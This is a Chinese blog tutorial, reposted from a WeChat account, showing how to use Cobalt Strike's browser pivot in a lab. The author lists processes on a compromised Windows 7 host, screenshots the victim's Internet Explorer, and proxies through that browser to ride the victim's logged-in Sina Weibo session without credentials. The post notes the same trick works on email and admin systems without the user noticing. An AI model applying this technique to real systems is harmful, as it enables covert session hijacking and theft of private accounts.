Cobaltstrike 还是除了是最好的域渗透平台,没有之一之外,还是很强大的协同apt平台,其中各种小功能包括邮件钓鱼,网页钓鱼,doc钓鱼等功能,这里我们介绍另外一个在进行渗透和信息收集中很重要的一个功能,browser pivot功能。
Browser pivot,顾名思义,就是通过浏览器建立起代理,这里的浏览器代理和常规的http浏览器代理还略有不同,不说废话了,直接看过程和结果。
目标机器:192.168.81.131 系统 win7 sp2 ,IE 11
teamserver:192.168.1.199 ubuntu 16.04
Cobaltstrike client 192.168.1.248
查看一下进程
beacon> ps
[*] Tasked beacon to list processes
[+] host called home, sent: 12 bytes
[*] Process List
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
0 0 [System Process]
4 0 System
280 4 smss.exe x64 0 NT AUTHORITYSYSTE
………………
2540 888 iexplore.exe x64 1 john-PCAdministrator
2616 444 conhost.exe x64 1 john-PCAdministrator
OK,我们可以看到运行了ie浏览器,进程id是2540,以administrator用户权限运行。抓屏看看ie打开了什么页面
beacon> screenshot 2540*600
[*] Tasked beacon to take screenshot
[+] host called home, sent: 162882 bytes
[*] received screenshot (261445 bytes)
抓了进程2540的ie浏览器截图,大小为600,在screenshot里面查看
发现用户正在登录新浪微博,ok,我们现在开始建立brwoser pivot,选screenshot中的浏览器进程,右键,可以看到Browser Pivot选项,如下图
点击Browser Pivot
这里我们可以看到,系统自动给我们选择了默认的浏览器父进程,pivot的默认端口是37606,这里你可以修改成你自己的自定义端口,这里我使用系统默认分配端口。查看 proxy pivot
这里已经在远程目标机器上建立了浏览器代理,通过teamserver的ip进行中转,这里我们打开本地浏览器
微博现在处于未登录状态,我们设置代理服务器看一下效果,在firefox里设置本地http代理,代理ip填写teamserver的ip,端口就是我们的代理端口
然后刷新一下浏览页面看一下效果
Bingo,在没有用户密码的情况下,顺利进入远程目标机器用的新浪微博。
这里我们只是拿新浪微博来进行举例,在实际的渗透过程中,用户登录的邮箱,后台管理以及其他的业务系统,也都可以利用此方法来进行登录,在远程用户没有察觉的情况下,获取到我们所需要的信息。
PS:brwoser pivot目前仅测试针对ie浏览器有效,在实际的工作中根据业务环境,来选择合适的渗透手法。
本文始发于微信公众号(milsec):Cobalt strike browser pivot的应用实例
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论